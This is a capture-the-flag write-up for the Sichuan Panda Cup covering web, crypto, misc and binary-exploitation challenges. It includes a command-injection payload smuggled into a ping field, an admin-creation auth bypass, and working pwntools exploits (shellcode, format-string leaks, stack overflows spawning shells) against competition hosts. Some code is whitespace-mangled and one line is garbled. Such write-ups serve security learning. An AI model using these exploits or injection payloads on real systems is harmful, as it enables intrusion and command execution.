
Title: Sichuan Panda Cup preliminary and final questions WP


Preliminary Competition

web_ezcms

Swagger leaked the test/test test-account login; /sys/user/** does not enforce authentication, so a super administrator user can be added.

1049983-20240802141202586-170871422.jpg

The roleId is still unknown at this point, and the role module is not accessible without authorization. Continuing to read the user module reveals the interface

1049983-20240802141203506-2056064072.jpg

There is a roleId leak here; fill in the admin id fcf34b56-a7a2-4719-9236-867495e74c31 leaked earlier.

GET /sys/user/roles/fcf34b56-a7a2-4719-9236-867495e74c31 — at this point the super administrator id is known to be 11b3b80c-4a0b-4a92-96ea-fdd4f7a4a7e9; add the user:

{

'createWhere':0,

'deptId':'1',

'email':'',

'password':'123456',

'phone':'11111111111',

'roleIds':[

'11b3b80c-4a0b-4a92-96ea-fdd4f7a4a7e9'

],

'sex':'fmale',

'username':'hacker'

} Decoding the password field failed; checking the log with the test account revealed the AES key AbCdEfGhIjKlMnOp, after which the user was added successfully. After adding the user, we found the ping function in the module, but a WAF is in front of it. Bypassing the WAF and executing the command yields the flag:

POST/sys/pingHTTP/1.1

Host:

User-Agent:Mozilla/5.0 (Macintosh; IntelMacOSX10.15; rv:126.0)Gecko/20100101Firefox/126.0

Accept:application/json,text/javascript,*/*;q=0.01

Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding:gzip,deflate

Content-Type:application/json;charset=UTF-8

authorization:eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJmY2YzNGI1Ni1hN2EyLTQ3MTktOTIzNi04Njc0OTVlNzRjMzEiLCJqd3Qtcm9sZXMta2V5XyI6WyLotoXnuqfnrqHnkIblkZgiXSwiaXNzIjoieWluZ3h1ZS5jb20iLCJqd3QtcGVybWlzc2lvbnMta2V5IjpbInN5czp1c2VyOmxpc3QiLCJzeXM 6ZGVwdDp1cGRhdGUiLCJzeXM6ZGVwdDpkZXRhaWwiLCJzeXM6dXNlcjpyb2xlOnVwZGF0ZSIsInN5czpwZXJtaXNzaW9uOmFkZCIsInN5czp1c2VyOmFkZCIsInN5czp1c2VyOmFkZCIsInN5czp1c2VyOmRlbGV0ZWQiLCJzeXM6cGVybWlzc2lvbjp1cGRhdGUiLCJzeXM6dXNlcjpkZXRhaWwiLCJzeXM6ZGVwdDpkZWxldGVkIiwic3lzOn JvbGU6dXBkYXRlIiwic3lzOnJvbGU6ZGV0YWlsIiwic3lzOmRlcHQ6bGlzdCIsInN5czpkZXB0OmFkZCIsInN5czp1c2VyOnVwZGF0ZSIsInN5czpyb2xlOmxpc3QiLCJzeXM6cm9sZTpkZWxldGVkIiwic3lzOnBlcm1pc3Npb246bGlzdCIsInN5czpwZXJtaXNzaW9uOmRldGFpbCIsInN5czpwZXJtaXNzaW9uOmRldGFpbCIsInN5czpwZXJtaXNzaW9uO mRlbGV0ZWQiLCJzeXM6bG9nOmRlbGV0ZWQiLCJzeXM6dXNlcjpyb2xlOmRldGFpbCIsInN5czpyb2xlOmFkZCIsInN5czpsb2c6bGlzdCJdLCJqd3QtdXNlci1uYW1lLWtleSI6ImFkbWluIiwiZXhwIjoxNzE2NzE3MjIwLCJpYXQiOjE3MTY3MTAwMjB9.9wcw8M2Ky0lFTbD2B7YaAmPKTl_EO0kJCB5J3bw8FkA

X-Requested-With:XMLHttpRequest

Content-Length:28

Origin:

DNT:1

Sec-GPC:1

Connection:close

Referer:

Cookie:JSESSIONID=C701D746DA63E8FB94270AD6D2FD9ADB

Sec-Fetch-Dest:empty

Sec-Fetch-Mode:cors

Sec-Fetch-Site:same-origin

Priority:u=1

{'ip':'10.10.10.10-1||cat/flag'}

Top Secret File-Code P

importcv2

importnumpyasnp

# Challenge value: s is asserted further down to equal p**2 + q**2 for two
# primes p and q, which the Cornacchia search below recovers.
s = 179093209181929149953346613617854206675976823277412565868079070299728290913658

fromCrypto.Util.numberimport*

#p,q=(241627603783727624224706687817893681267,

#347432454257893250496407965506777649463)

##assertp**2+q**2==s

##print(isPrime(p),isPrime(q))

#Img_path='flag_enc.png'

#Img=cv2.imread(Img_path)

#print(Img.shape)

fromympy.solvers.diophantine.diophantineimportcornacchia

'''

This part needs adapting: s has to be factored, and factordb is enough for that

f={7247215681561944590028089613581484765881:1,157606014243244438240601:1,5801674693:1,2:1,13513:1}

'''

# Enumerate the representations s = a**2 + b**2 via Cornacchia's algorithm and
# print the pair whose components are both prime — that pair is (p, q).
x1 = cornacchia(1, 1, s)
for a, b in x1:
    assert a * a + b * b == s
    if not (isPrime(a) and isPrime(b)):
        continue
    print(a, b)

#I got p and q here

fromCrypto.Util.numberimport*

# (p, q) as recovered by the Cornacchia search above; re-check the claim
# (both prime, squares summing to s) before using them on the image.
p, q = (
    302951519846417861008714825074296492447,
    295488723650623654106370451762393175957,
)
s = 179093209181929149953346613617854206675976823277412565868079070299728290913658
assert isPrime(p) and isPrime(q)
assert p**2 + q**2 == s

importcv2

# Load the scrambled image. cv2.imread returns None for a missing/unreadable
# file, in which case the shape unpack below raises.
path1 = 'flag_enc.png'
img = cv2.imread(path1)
r, c, d = img.shape  # rows, columns, channels
print(r, c)

#i,j=101,201

fromtqdmimporttqdm

# Orbit-length check for the map (i, j) -> ((i + b*j) % r, (a*i + (a*b+1)*j) % c):
# starting from every pixel position, follow the map until a position repeats
# and count how many distinct positions were visited.
a,b=p,q

foriintqdm(range(r)):

forjinrange(c):

set1=set()

set1.add((i,j))

i1,j1=i,j

whileTrue:

x=(i1+b*j1)%r

y=((a*i1)+(a*b+1)*j1)%c

i1,j1=x,y

if(x,y)notinset1:

set1.add((x,y))

else:

# (0, 0) is a fixed point of the map (x = y = 0), hence the special case.
ifi==0andj==0:

# NOTE(review): this paste has lost its indentation and the line below
# ("Continue continue") is garbled; the loop exit that ends the while-loop
# cannot be recovered from this copy.
Continue continue

assertlen(set1)==190# every orbit is expected to have length 190 (the map's period)

#We found that it was 190 here. It was a coincidence that we just started to touch it later.

#s1=s%190

#print(s1)

#importnumpyasnp

#defarnold(img,shuffle_times,a,b):

#r,c,d=img.shape

#p=np.zeros(img.shape,np.uint8)

#print(r,c,d,shuffle_times)

#forsinrange(shuffle_times):

#foriinrange(r):

#forjinrange(c):

#x=(i+b*j)%r

#y=((a*i)+(a*b+1)*j)%c

#p[x,y,]=img[i,j,]

#img=np.copy(p)

#returnp

#x1=arnold(img,11,p,q)

#cv2.imwrite('flag3.png',x1)

##cv2.imwrite('flag1.png',img)

#

# Challenge value c = p**2 + q**2, with (p, q) the primes recovered above.
c = 179093209181929149953346613617854206675976823277412565868079070299728290913658
p = 302951519846417861008714825074296492447
q = 295488723650623654106370451762393175957

importcv2

importnumpyasnp

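def arnold(img, shuffle_times, a, b):
    """Apply the Arnold-style pixel permutation to ``img`` ``shuffle_times`` times.

    Each round moves the pixel at (i, j) to
    ((i + b*j) % r, (a*i + (a*b + 1)*j) % c), where r and c are the row and
    column counts of the image.

    Args:
        img: array of shape (rows, cols, channels), e.g. as returned by cv2.imread.
        shuffle_times: number of rounds to apply; 0 yields an all-zero image of
            the same shape, because no pixel is ever copied.
        a, b: integer map parameters (arbitrary-size Python ints are fine).

    Returns:
        The scrambled image as a ``uint8`` array of the same shape as ``img``.
        (The original version ended with a bare ``return`` and so handed
        ``None`` back to its caller, which broke the second round of the
        decoding loop.)
    """
    r, c, d = img.shape
    p = np.zeros(img.shape, np.uint8)
    print(r, c, d, shuffle_times)
    ab1 = a * b + 1  # loop-invariant coefficient of j in the column map
    for _ in range(shuffle_times):
        for i in range(r):
            ai = a * i
            for j in range(c):
                x = (i + b * j) % r
                y = (ai + ab1 * j) % c
                # Cells never written in this round keep their previous content,
                # so the loop form is kept rather than a vectorised assignment.
                p[x, y, ] = img[i, j, ]
        # The next round reads from the scrambled result; copy so that the
        # writes into p cannot alias the array being read.
        img = np.copy(p)
    return p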

# Undo the scrambling by brute force: apply one map round at a time and write
# every intermediate image out, so the readable one can be picked by eye.
img = cv2.imread('flag_enc.png')
c1 = c % 190  # computed but never used below; kept as in the original script
for i in range(190):
    img = arnold(img, 1, p, q)
    cv2.imwrite(f'flag{i+1}.png', img)

'''

1. Just brute-force it: the period is 190 anyway, so enumerate all of them. At i=66, flag67.png is the flag

2.flag{Ailuropoda_rnelanoleuca}

'''

Persist in doing the right thing

The data recovered from the traffic capture is the hex dump of an image

1049983-20240802141204115-667496384.jpg

Inspecting its hex reveals additional data appended at the end

1049983-20240802141204919-1421521109.jpg

It is a Vim drawing command; install DrawIt directly and enter the command to draw the map

GAME

Play the game directly to get the flag

This is a real sign-in

1049983-20240802141205695-1581426213.jpg

FunIoT

A set of Docker files is given, running a binary inside; reverse it directly, then combine dynamic debugging and static analysis to work out the protocol format, and finally use one of its file-reading functions, with // to bypass the comparison check:

1049983-20240802141206375-612647167.jpg

Then read the flag:

frommpwnimport*

importzlib

#p=remote('127.0.0.1',6768)

p=remote('173.34.20.10',6768)

header=b'FunIoT'#6

cmd=0x102

cmd_encode=int(cmd).to_bytes(2,'big')

len=0x0101

length=int(len).to_bytes(2,'big')

#content=b'getInfo:shadow'

#content=b'getInfo:/lib/udev/rc_keymaps/asus_pc39.toml'

content=b'getInfo://flag'

content=content.ljust(0x101,b'\x00')

check_sum=int(zlib.crc32(content)).to_bytes(4,'big')

full_content=header+length+cmd_encode+check_sum+content

#packet:

#header:6bytes

#length:2bytes

#cmd:2bytes

#checksum:4bytes

#content:unknow

context.log_level='debug'

p.send(full_content)

#p.interactive()

importbase64

print(base64.b64decode(p.recv()).decode('utf-8'))

#command:getInfo,setInfo,secret

guess_hack

The challenge asks for a minimum and a maximum value and then has you guess a random number in that range. A correct guess leads to a stack overflow, where the number of overflowing characters equals the number of wrong guesses; so one can enter two adjacent numbers, guess wrong enough times, and then perform a regular stack-overflow exploitation. Because the stack is executable, and the check only requires that the payload is non-empty, I wrote shellcode directly and used a small XOR to get past the non-empty check:

#random%(max-min+1)+min

frommpwnimport*

context.log_level='debug'

#p=process('./main')

p=remote('173.34.20.233',9999)

p.sendlineafter(b'ch:',b'1')

p.sendlineafter(b'Enteraminimumandmaximumnumberfortheguessinggame:',b'12')

foriinrange(99):

p.sendlineafter(b'Guessanumber',b'1')

p.sendlineafter(b'Guessanumberbetween',b'2')

payload=b'a'*0x3c

payload+=p32(0x0805dea9)

payload+=asm(''' push0xffffffff4

popeax

push0xffffffffffff

popepx

xoreax,ebx

push0xff978cd0

popecx

xorecx,ebx

pushecx

push0x6e69622f

movebx,esp

xorecx,ecx

int0x80''')

payload=payload.ljust(99,b'a')

pause()

p.sendlineafter(b'Congratulations!',payload)

p.interactive()

msg

A stack overflow plus a format-string vulnerability: the format-string vulnerability is used to leak the canary and libc, and the overflow then overwrites the return address with a one_gadget:

frommpwnimport*

#p=process('./main')

p=remote('173.34.20.68',9999)

p.sendlineafter(b'message:',b'%11$p')

canary=int(p.recv(18),16)

success(f'canary:{hex(canary)}')

p.sendlineafter(b'message:',b'%3$p')

libc=int(p.recv(14),16)-0x10e1f2

success(f'libc:{hex(libc)}')

one=libc+0xe3b01

p.sendlineafter(b'message:',b'a'*0x28+p64(canary)+b'b'*8+p64(one))

pause()

p.sendlineafter(b'message:',b'\x00'*0x10)

p.interactive()

stackover

This is also a classic stack overflow, but the remote libc differs slightly from the local one. In addition, the function returns through `lea esp, [ecx-4]; ret`, which I did not manage to exploit. However, after steering the program to various output points, the stack layout turned out to be basically the same, so in the end the exploit was written without relying on libc:

frommpwnimport*

#context.log_level='debug'

#p=process('./stackover')

p=remote(b'173.34.20.46',9999)

p.sendafter(b'read:',b'a'*0x29b)

p.recvuntil(b'a'*0x29b)

canary=u32(b'\x00'+p.recv(3))

success(f'canary:{hex(canary)}')

#pause()

p.sendafter(b'read:',b'a'*(0x29b+7+8+0x2c-0x30-4))

p.recvuntil(b'a'*(0x29b+7+8+0x2c-0x30-4))

p.recv(4)

p.recv(4)

stack=u32(p.recv(4))

success(f'stack:{hex(stack)}')

#pause()

p.sendafter(b'read:',b'b'*(0x29b+0x18+7))

p.recvuntil(b'b'*(0x29b+0x18+7))

libc=u32(p.recv(4))-0x1aed5

success(f'libc:{hex(libc)}')

#pause()

p.sendafter(b'read:',b'a'*(0x29b+7+8+0x2c+0x54))

p.recvuntil(b'a'*(0x29b+7+8+0x2c+0x54))

elf_base=u32(p.recv(4))-0x3fb8

success(f'elf_base:{hex(elf_base)}')

payload=b'c'*(0x29a-0x14-8)

#execve0xc9510

#system0x41780

#puts0x6dc40

#payload+=p32(libc+0x6dc40)

#payload+=p32(elf_base+0x1130)

payload+=b'/bin/sh\x00'

payload+=p32(elf_base+0x128e)

#payload+=p32(elf_base+0x3fcc)

#payload+=p32(0)

payload+=p32(stack-0x50)

payload+=p32(0)

#payload+=p32(libc+0x18e363)

#payload+=p32(libc+0x18e363)

payload+=p32(0)

payload+=p32(0)

payload+=p32(canary)

payload+=p32(0)*3

payload+=p32(stack-0x44)

payload+=p32(elf_base+0x3fb8)

payload+=b'/bin/sh\x00'

pause()

context.log_level='debug'

p.sendafter(b'read:',payload)

p.interactive()

stackover-revenge

It provides addition and subtraction within 255. At first no vulnerability was visible, but later I found that a small piece of backdoor code had been added to the program's normal flow:

1049983-20240802141207116-1405232494.jpg

IDA's F5 decompilation does not show this part. Backdoor code elsewhere can satisfy the triggering conditions of the code above:
